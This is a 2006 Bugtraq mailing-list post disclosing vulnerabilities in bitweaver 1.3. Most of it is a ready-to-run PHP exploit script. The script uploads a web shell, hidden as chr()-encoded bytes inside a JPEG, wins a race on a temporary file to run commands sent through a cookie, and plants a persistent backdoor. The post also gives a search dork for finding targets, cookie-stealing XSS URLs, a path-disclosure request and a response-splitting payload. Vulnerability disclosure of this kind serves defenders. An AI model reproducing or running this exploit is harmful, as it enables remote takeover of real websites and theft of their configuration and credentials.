bitweaver <= v1.3 multiple vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: bitweaver <= v1.3 multiple vulnerabilities
From: rgod@xxxxxxxxxxxxx
Date: 17 Jun 2006 00:30:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit\r\n";
echo "by rgod rgod@xxxxxxxxxxxxx\r\n";
echo "site: http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by bitweaver\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to bitweaver\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /bitweaver/ cat 
./../../kernel/config_inc.php\r\n";
echo "php ".$argv[0]." localhost /bitweaver/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
die;
}

/*
software site: http://www.bitweaver.org/articles/

i)
vulnerable code in articles/BitArticle.php near lines 456-478:

...
if( !empty( $_FILES['article_image']['name'] ) ) {
                        // store the image in temp/articles/
                        $tmpImagePath = 
TEMP_PKG_PATH.ARTICLES_PKG_NAME.'/'.'temp_'.$_FILES['article_image']['name'];

                        $tmpImageName = preg_replace( "/(.*)\..*?$/", "$1", 
$_FILES['article_image']['name'] );
                        if( !is_dir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ) ) {
                                mkdir( TEMP_PKG_PATH.ARTICLES_PKG_NAME );
                        }
                        if( !move_uploaded_file( 
$_FILES['article_image']['tmp_name'], $tmpImagePath ) ) {
                                $this->mErrors['article_image'] = "Error during 
attachment of article image";
                        } else {
                                $resizeFunc = ( $gBitSystem->getPreference( 
'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 
'liberty_gd_resize_image';
                                $pFileHash['source_file'] = $tmpImagePath;
                                $pFileHash['dest_path'] = 
TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/';
                                // remove the extension
                                $pFileHash['dest_base_name'] = $tmpImageName;
                                $pFileHash['max_width'] = 
ARTICLE_TOPIC_THUMBNAIL_SIZE;
                                $pFileHash['max_height'] = 
ARTICLE_TOPIC_THUMBNAIL_SIZE;
                                $pFileHash['type'] = 
$_FILES['article_image']['type'];
                                if( !( $resizeFunc( $pFileHash ) ) ) {
                                        $this->mErrors[] = 'Error while 
resizing article image';
                                }
                                @unlink( $tmpImagePath );
...

explaination:
a remote user can go to:

http://[target]/[path]/articles/edit.php

to submit an article to the administrator, you can attach an image there.
You can submit a file like this, with double extension:

suntzu1234.php.xxx

a temporary copy of the file is created in temp/articles/ folder and renamed
like this:

temp_suntzu1234.php.xxx

(see $tmpImagePath argument...)

you have about 0.1 / 0.2 seconds to launch commands :), because temporary file
is deleted

http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir

this works fine on most Apache servers...

note: this folder is not properly protected, we have an .htaccess file like 
this:

<FilesMatch "\.ph(p(3|4)?|tml)$">
    order deny,allow
    deny from all
</FilesMatch>

ii) two cross site scripting vulnerabilities:

http://[target]/[path_to_bitweaver]/users/login.php?error=<script>alert(document.cookie)</script>
http://[target]/[path_to_bitweaver]/articles/index.php?feedback=<script>alert(document.cookie)</script>

iii) a trick to see bitweaver "white screen of death":

http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuuuuuuuuuu

and disclose full application path, database table prefix ,among other things...

iv) various http response splitting vulnerabilities, this is one:

http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers]

this is the exploit for i), it creates a backdoor called suntzu.php.xxx in
temp/articles/ when you succeed for the first time
                                                                              */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;

}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the 
path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"*delim*"))
{ echo "Exploit succeeded...\r\n";
  $temp=explode("*delim*",$html);
  die($temp[1]);
}

$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0xc0).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).
chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).
chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).
chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).
chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).
chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).
chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).
chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).
chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).
chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).
chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).
chr(0x3b).chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).
chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).
chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).
chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x2a).
chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).chr(0x3b).
chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).chr(0x3d).chr(0x66).chr(0x6f).
chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).
chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).
chr(0x78).chr(0x78).chr(0x78).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).
chr(0x73).chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).
chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).
chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).
chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).
chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).
chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).
chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).
chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).
chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).
chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).
chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).
chr(0x65).chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).
chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).
chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).
chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x70).chr(0x61).chr(0x73).
chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).chr(0x63).
chr(0x68).chr(0x6f).chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).
chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x3f).
chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x63).
chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).chr(0x24).chr(0x66).chr(0x70).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).chr(0x68).chr(0x6d).chr(0x6f).
chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).
chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).chr(0x78).chr(0x78).
chr(0x78).chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).
chr(0x0d).chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).
chr(0x4a).chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
chr(0x00).chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).
chr(0x00).chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0xff).chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).
chr(0x01).chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).
chr(0x03).chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x08).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).
chr(0xc4).chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).
chr(0x00).chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).
chr(0x03).chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).
chr(0x3f).chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).
chr(0x00).chr(0x00);

/*
this image has this code inside as EXIF metadata:
<?php
error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) 
{$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 
"*delim*";passthru($_COOKIE[cmd]);echo "*delim*";
$fp=fopen("suntzu.php.xxx","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if 
(get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 
\"*delim*\";passthru(\$_COOKIE[cmd]);echo \"*delim*\";?>");
fclose($fp);
chmod("suntzu.php.xxx",777);
?>
*/

srand(make_seed());
$anumber = rand(1,99999);
$data='-----------------------------7d63b53760260
Content-Disposition: form-data; name="tk"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_id"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview_image_url"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview_image_path"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="title"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="author_name"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_type_id"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="rating"

3
-----------------------------7d63b53760260
Content-Disposition: form-data; name="format_guid"

tikiwiki
-----------------------------7d63b53760260
Content-Disposition: form-data; name="edit"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview"

Preview
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publishDateInput"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Month"

06
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Day"

15
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Year"

2006
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Hour"

22
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Minute"

33
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expireDateInput"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Month"

06
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Day"

15
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Year"

2007
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Hour"

22
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Minute"

33
-----------------------------7d63b53760260
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_image"; 
filename="suntzu'.$anumber.'.php.xxx"
Content-Type:

'.$shell.'
-----------------------------7d63b53760260--
';

$packet="POST ".$p."/articles/edit.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."articles/edit.php\r\n";;
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; 
boundary=---------------------------7d63b53760260\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
if ($proxy=="")
{$ffpp=fsockopen($host,$port);}
else
{
$parts=explode(':',$proxy);
$ffpp=fsockopen($parts[0],$parts[1]);
}
fputs($ffpp,$packet);//we don't need output, quickly look for temporary file...
$packet="GET ".$p."temp/articles/temp_suntzu".$anumber.".php.xxx HTTP/1.0\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n"; //through cookies...
$packet.="Connection: Close\r\n\r\n";
for ($i=0; $i<=99; $i++)
{
sendpacketii($packet);
if (strstr($html,"200 OK")){
echo "temp_suntzu".$anumber.".php.xxx file found...\r\n";
if (!strstr($html,"passthru")) //not executed as php code
{ echo "Exploit succeeded...\r\n";
  $temp=explode("*delim*",$html);
  die($temp[1]);
}
else
{echo "Exploit failed...\r\n";}
}
}
fclose($ffpp);
//if you are here...
echo "Exploit failed...";
?>


original url: http://retrogod.altervista.org/bitweaver_13_xpl.html
Prev by Date: Re: PHP security (or the lack thereof)
Next by Date: [ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion
Previous by thread: GreatDomains.com - XSS with cookie disclosure
Next by thread: [ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion
Index(es):
- Date
- Thread